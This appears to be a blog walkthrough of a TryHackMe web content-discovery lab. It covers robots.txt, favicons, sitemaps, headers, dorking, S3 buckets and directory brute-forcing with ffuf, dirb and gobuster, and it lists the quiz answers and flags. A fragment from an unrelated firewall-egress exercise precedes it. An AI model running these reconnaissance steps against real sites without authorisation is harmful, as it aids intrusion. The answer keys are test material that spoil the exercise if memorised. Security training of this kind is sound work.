Next, go back to your Kali machine, execute Wireshark again and point it to listen on the tap0 interface.

Finally, right-click the downloaded BAT file on the 172.16.91.100 machine and click "Run as administrator."

A similar window to the one below will pop up. In the meantime, go to Wireshark on your Kali machine and observe the traffic.

After a short period of time, Wireshark will receive a packet destined to port 9000 - which means that this port is also allowed outbound connectivity on the 172.16.91.100 machine's firewall; this is the third and last port which is allowed outbound connectivity.

Disclaimer

What Is Content Discovery?

Firstly, we should ask, in the context of web application security, what is content? Content can be many things, a file, video, picture, backup, a website feature. When we talk about content discovery, we're not talking about the obvious things we can see on a website; it's the things that aren't immediately presented to us and that weren't always intended for public access.

This content could be, for example, pages or portals intended for staff usage, older versions of the website, backup files, configuration files, administration panels, etc.

There are three main ways of discovering content on a website which we'll cover. Manually, Automated and OSINT (Open-Source Intelligence).

Start the machine and then move on to the next task.






1) What is the Content Discovery method that begins with M?

Ans- Manually



2) What is the Content Discovery method that begins with A?

Ans- Automated



3) What is the Content Discovery method that begins with O?

Ans- OSINT

Manual Discovery - Robots.txt

There are multiple places we can manually check on a website to start discovering more content.



Robots.txt

The robots.txt file is a document that tells search engines which pages they are and aren't allowed to show on their search engine results or ban specific search engines from crawling the website altogether. It can be common practice to restrict certain website areas so they aren't displayed in search engine results. These pages may be areas such as administration portals or files meant for the website's customers. This file gives us a great list of locations on the website that the owners don't want us to discover as penetration testers.


Take a look at the robots.txt file on the Acme IT Support website to see if they have anything they don't want to list: http://MACHINE_IP/robots.txt



1) What is the directory in the robots.txt that isn't allowed to be viewed by web crawlers?


 

Ans- /staff-portal

 

Manual Discovery - Favicon

Favicon

The favicon is a small icon displayed in the browser's address bar or tab used for branding a website.

Sometimes when frameworks are used to build a website, a favicon that is part of the installation gets leftover, and if the website developer doesn't replace this with a custom one, this can give us a clue on what framework is in use. OWASP host a database of common framework icons that you can use to check against the targets favicon https://wiki.owasp.org/index.php/OWASP_favicon_database. Once we know the framework stack, we can use external resources to discover more about it (see next section).

Practical Exercise:

Open the website https://static-labs.tryhackme.cloud/sites/favicon/ here you'll see a basic website with a note saying "Website coming soon...", if you look at your tabs you'll notice an icon that confirms this site is using a favicon.


Viewing the page source you'll see line six contains a link to the images/favicon.ico file. 

If you run the following command it will download the favicon and get its md5 hash value which you can then lookup on the
https://wiki.owasp.org/index.php/OWASP_favicon_database.

 
1) What framework did the favicon belong to?

HINT- Visit this link https://wiki.owasp.org/index.php/OWASP_favicon_database

Ans- cgiirc

Manual Discovery - Sitemap.xml

Sitemap.xml

Unlike the robots.txt file, which restricts what search engine crawlers can look at, the sitemap.xml file gives a list of every file the website owner wishes to be listed on a search engine. These can sometimes contain areas of the website that are a bit more difficult to navigate to or even list some old webpages that the current site no longer uses but are still working behind the scenes.


Take a look at the sitemap.xml file on the Acme IT Support website to see if there's any new content we haven't yet discovered: http://10.10.159.199/sitemap.xml



1) What is the path of the secret area that can be found in the sitemap.xml file?


Ans- /s3cr3t-area

Manual Discovery - HTTP Headers

HTTP Headers

When we make requests to the web server, the server returns various HTTP headers. These headers can sometimes contain useful information such as the webserver software and possibly the programming/scripting language in use. In the below example, we can see the webserver is NGINX version 1.18.0 and runs PHP version 7.4.3. Using this information, we could find vulnerable versions of software being used. Try running the below curl command against the web server, where the -v switch enables verbose mode, which will output the headers (there might be something interesting!).

 

           

 

        
┌──(hackerboy㉿KumarAtulJaiswal)-[~]
└─$ curl http://10.10.159.199 -v
*   Trying 10.10.159.199:80...
* Connected to 10.10.159.199 (10.10.159.199) port 80 (#0)
>  GET / HTTP/1.1
>  Host: 10.10.159.199
>  User-Agent: curl/7.74.0
>  Accept: */*
> * Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: nginx/1.18.0 (Ubuntu)
< Date: Thu, 02 Dec 2021 16:44:21 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: keep-alive
< X-FLAG: THM{HEADER_FLAG}
< 
<!--
This page is temporary while we work on the new homepage @ /new-home-beta
-->

1) What is the flag value from the X-FLAG header?
  
Ans- THM{HEADER_FLAG}

 

Manual Discovery - Framework Stack

Framework Stack

Once you've established the framework of a website, either from the above favicon example or by looking for clues in the page source such as comments, copyright notices or credits, you can then locate the framework's website. From there, we can learn more about the software and other information, possibly leading to more content we can discover.


Looking at the page source of our Acme IT Support website (http://10.10.159.199), you'll see a comment at the end of every page with a page load time and also a link to the framework's website, which is https://static-labs.tryhackme.cloud/sites/thm-web-framework. Let's take a look at that website. Viewing the documentation page gives us the path of the framework's administration portal, which gives us a flag if viewed on the Acme IT Support website.



1) What is the flag from the framework's administration portal?

 

Ans- THM{CHANGE_DEFAULT_CREDENTIALS}

 

OSINT - Google Hacking / Dorking

There are also external resources available that can help in discovering information about your target website; these resources are often referred to as OSINT or (Open-Source Intelligence) as they're freely available tools that collect information:

Google Hacking / Dorking

Google hacking / Dorking utilizes Google's advanced search engine features, which allow you to pick out custom content. You can, for instance, pick out results from a certain domain name using the site: filter, for example (site:hackingtruth.in) you can then match this up with certain search terms, say, for example, the word admin (site:hackingtruth.in admin) this then would only return results from the hackingtruth.in website which contain the word admin in its content. You can combine multiple filters as well. Here is an example of more filters you can use:

More information about google hacking can be found here: https://en.wikipedia.org/wiki/Google_hacking



1) What Google dork operator can be used to only show results from a particular site?

Ans- site:

OSINT - Wappalyzer

Wappalyzer

Wappalyzer (https://www.wappalyzer.com/) is an online tool and browser extension that helps identify what technologies a website uses, such as frameworks, Content Management Systems (CMS), payment processors and much more, and it can even find version numbers as well.



1) What online tool can be used to identify what technologies a website is running?

Ans- Wappalyzer

OSINT - Wayback Machine

Wayback Machine

The Wayback Machine (https://archive.org/web/) is a historical archive of websites that dates back to the late 90s. You can search a domain name, and it will show you all the times the service scraped the web page and saved the contents. This service can help uncover old pages that may still be active on the current website.



1) What is the website address for the Wayback Machine?

Ans- https://archive.org/web/

OSINT - GitHub

GitHub

To understand GitHub, you first need to understand Git. Git is a version control system that tracks changes to files in a project. Working in a team is easier because you can see what each team member is editing and what changes they made to files. When users have finished making their changes, they commit them with a message and then push them back to a central location (repository) for the other users to then pull those changes to their local machines. GitHub is a hosted version of Git on the internet. Repositories can either be set to public or private and have various access controls. You can use GitHub's search feature to look for company names or website names to try and locate repositories belonging to your target. Once discovered, you may have access to source code, passwords or other content that you hadn't yet found.



1) What is Git?

Ans- Version Control System

OSINT - S3 Buckets

S3 Buckets

S3 Buckets are a storage service provided by Amazon AWS, allowing people to save files and even static website content in the cloud accessible over HTTP and HTTPS. The owner of the files can set access permissions to either make files public, private and even writable. Sometimes these access permissions are incorrectly set and inadvertently allow access to files that shouldn't be available to the public. The format of the S3 buckets is http(s)://{name}.s3.amazonaws.com where {name} is decided by the owner, such as tryhackme-assets.s3.amazonaws.com. S3 buckets can be discovered in many ways, such as finding the URLs in the website's page source, GitHub repositories, or even automating the process. One common automation method is by using the company name followed by common terms such as {name}-assets, {name}-www, {name}-public, {name}-private, etc.



1) What URL format do Amazon S3 buckets end in?

Ans- .s3.amazonaws.com

Automated Discovery

What is Automated Discovery?


Automated discovery is the process of using tools to discover content rather than doing it manually. This process is automated as it usually contains hundreds, thousands or even millions of requests to a web server. These requests check whether a file or directory exists on a website, giving us access to resources we didn't previously know existed. This process is made possible by using a resource called wordlists.

What are wordlists?

Wordlists are just text files that contain a long list of commonly used words; they can cover many different use cases. For example, a password wordlist would include the most frequently used passwords, whereas we're looking for content in our case, so we'd require a list containing the most commonly used directory and file names. An excellent resource for wordlists that is preinstalled on the THM AttackBox is https://github.com/danielmiessler/SecLists which Daniel Miessler curates.

Automation Tools

Although there are many different content discovery tools available, all with their features and flaws, we're going to cover three which are preinstalled on our attack box, ffuf, dirb and gobuster.


Open the THM AttackBox using the blue Start AttackBox button and then try the below three commands on our Acme IT Support website and see what results you get.

 

Using ffuf:

ffuf

        
user@machine$ ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://10.10.159.199/FUZZ

        



Using dirb:

dirb

           
user@machine$ dirb http://10.10.159.199/ /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt

        



Using Gobuster:

gobuster

           
user@machine$ gobuster dir --url http://10.10.159.199/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt

        

1) What is the name of the directory beginning "/mo...." that was discovered?

Ans- /monthly



2) What is the name of the log file that was discovered?

Ans- /development.log

 

Disclaimer